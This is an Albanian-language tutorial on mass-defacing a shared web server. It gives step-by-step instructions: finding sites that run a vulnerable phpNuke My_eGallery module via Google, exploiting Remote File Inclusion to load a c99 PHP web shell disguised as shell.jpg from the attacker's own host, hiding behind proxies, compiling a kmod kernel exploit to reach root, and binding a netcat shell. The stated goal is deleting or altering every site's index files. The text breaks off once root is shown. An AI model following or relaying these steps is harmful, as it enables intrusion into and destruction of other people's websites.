MASS DEFACE do te thote SHKATRRIM I PLOTE
Me se pari mesoni me u bind per nje send nuk eshte sikur ne film qe vjen njari shkruan
dicka edhe hyn ne NASA, ose ben me eksplodua PC-en ky eshte realitet virual.
Thene keta, ne kete mesim (Tutorial) do tju tregoj ne menyren me te leht dhe me te
shkurter si me ba nje Mass Deface ne nje Server, mbajeni mend se nuk mund te bahet gjithmon
por vetem ne serverat vulnerability gje do te flas me vone...
----------------------------------------------------------------------------------------------
1 - Cka duhet te dini
Duhet ta njohni bazen e Linux-it
Komandat per Shell Linux
Ta njohur bazen e PHP-es
Ta njohur bazen e HTML-it
Si me kompilua nje C program per Linux
Nese nuk dini nje nga keto perdorni nje motor kerkimi si GOOGLE she gjeni shum tutorial te nevojshem
-----------------------------------------
2 - Cka duhet me pase
Duhet me e pas PC te konektuam ne Internet lol
Nje list te mire proxy-sh
Dhe shum kohe me humb mbas PC-jet
-----------------------------------------
3 - Ja fillojme...
Teknika qe do tju tregoj permbahet ne 4 pika
1 Te gjeni nje web vulnerabily
2 Burica ( BUG )
3 Me fitua accessin ne ROOT
4 Me fshi, modifikua, gjitha index (html, php) dhe kejt filet qe jane ne ate server
-----------------------------------------
3 - Remote File Inclusion e phpNuke
Ka shume lloje te vulnerability, ajo qe na duhet neve eshte Remote File Inclusion.
Qe eshte Thiesht aj mundeson me egzekutua nga nje server nje PHP script te hostuar nga serveri tjeter.
Si nje shembull do te marrim nje buric (BUG) ne My_eGallery te phpNuke-s. Per me gjet webat vurnelabily
mund te na ndihmoj shoku yne Google Beni nje kerrkim te thjesht me allinurlmy_eGallery kete fjale.
-----------------------------------------
4 - Burica (BUG)
Buricen qe do ta perdorim eshte qysh verzionit 3.1.1 te My_eGallery e me poshte.
httpwww.viktima.commodulesMy_eG....comshell.jpg
Cfare do te thote kjo Me nisjen e nje URL-i keshtu nga webbrowseri juaj ben te egzekutosh shell.jpg
qe eshte nje nje host tjeter ( httpwebijuaj.com ). Ne qofte se ne do e vendosim shell.php ateher do ta egzekutoj
sikur te ishte ne host te tij, keshtu qe vendosim shell.jpg apo txt qe te egzekutoj sikur ishte ne hostin e viktimes.
-----------------------------------------
5 - Shelli ne PHP
Cka eshte nje Shell (shpresoj se e dini), gjeja e bukur eshte se mundesh me krijua nje PH script dhe mund ta kontrollosh nga REMOTE
permes browserit tone ( IE Suck! Firefox Rulez www.getfirefox.com ) ka shume opcione dhe nje nga ato edhe Mass Deface
-----------------------------------------
6 - Ja fillojme seriozisht
Supozojm se e keni gjetur viktimen te cilen doni me sulmua... dhe aj e ka te instaluar
my_eGallery ( nepermjet te ciles kemi me perore Remote File IInclusion)
dhe shelli juaj te jet ne www.webijuaj.comshell.jpg -- (kuptohet aty ku shkrua webijuaj.com e vendosni webin tuaj)
Me browserin ton mire te mbrojtur me proxy shkojm ne kete URL (adres)
httpwww.viktima.commodulesMy_eG....comshell.jpg
(edhe ketu kuptohet se viktima dhe webijuaj ndyshohet)
Nese fitoni nje mesazh si Were you trying to hack our site or server Go Away Bastard ose dicka te ngjejshem
nuk mund te beni kurr gja! Nese te kunderten shiqojm nje shkrima ! c99 Shell ! apo dicka ashtu ateher mund te jemi pak te gezuam
Ne pjesen e lart te Shell-it jane informacionet e serverit si OS , IP , verzioni i webserverit e tjeter...
----------------------------------------------------------------------------------
Software Apache1.3.6 (Unix) (SuSeLinux) PHP4.3.1
uname -a Linux sito.host.it 2.2.5-15 #1 Mon Apr 19 230046 EDT 1999 i686
uid=99(nobody) gid=99(nobody) groups=99(nobody)
Safe-mode OFF (not secure)
Directory wwwwebi.com rwxrwxrwx
Free 2.83 GB of 13.27 GB (21.3%)
----------------------------------------------------------------------------------Keto informacione ne Linux fitohen me komanden uname -a ,
Nese shihni se sjemni ne nje Server Linux ateher lejeni kete pune.
Ne mes te ketyre infove do te shihni edhe verzionin e KERNEL, zemra e linuxit, qe per fat tonin eshte plot me burica (BUG's)
Prej pseudonimit (userit) te tanishem (nobody), pa privilegje me u be root ose me mire me u be Zoti i Sistemit.
Tani do te marrim nje gjiro ne Server...
Vazhdoni te shfletoni direktoriumet, dhe se gjithcka shkon sipas planeve do te arrini ne direktoriumin (folderin) www
dhe ne te nga nje nen folder dhe secila me emer te nga nje web sajti.
Per te evituar se ne nje menyr kaq te leht te Hackohen te gjith klientat e ospituar (hostuar) dhe te pas kontrollin
e komplet te serverit, egzistojn pseudonime (usera) te ndryshem, dhe secili privilegjet apo mundesit e tije.
Ne tani jemi nobody (mund te kontrolloni me komanden whoami) dhe kemi access vetem ne kartelat me chmod 777
ose me mire ato te shkruashme nga shithkush, ne fakt eshte menyr per te uploduar foto ose file ne server.
Kerrkojme nje kartel ne te cilen kemi FULL ACCESS access te plote, ne c99 jane evidenca ne gjelbert.
7 - Root
Si tja bejme te behemi root
Shfrytezojm (exploit-ojme) Kernel-in (zemeren e linux-it)
Exploiti i cili na duhet eshte aj i kmod, mund te gjehet shum leht nga google, e shkarkojm, ateher e uplodojm ne server nepermes c99
dhe e kompilojme, gcc kmod.c - kmod ....
E chmod-ojme ne 777 per me mujt me e egzekutua dhe ne jemi ne rregull
Tash perdorim funcionin bind te c99-tes, qe na krijon nje shell ne server qe na mundeson me hy me Netcat ose Telnet.
e vendosim ne portin te cilin ne deshirojme, dhe e bejm bind, nese serveri seshte i mbrojtur nga firewall ateher do te jet ne rregull,
Nese ka firewall do tju tregojme me vone se si me ja be!
Tani te konektohemi ne shellin tone dhe te bejm nje id si pergjigjie do te duhet te fitomi keshtu
--------------------------------------------------------
uid=99(nobody) gid=99(nobody) groups=99(nobody)
--------------------------------------------------------qe na tregon utilitetin e userit tone,
tani egzekutojm exploitin me .kmod , e bejme perseri id dhe nese gjithcka shkon si duhet
----------------------------------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
--------------------------------------------------------------------------------------
|
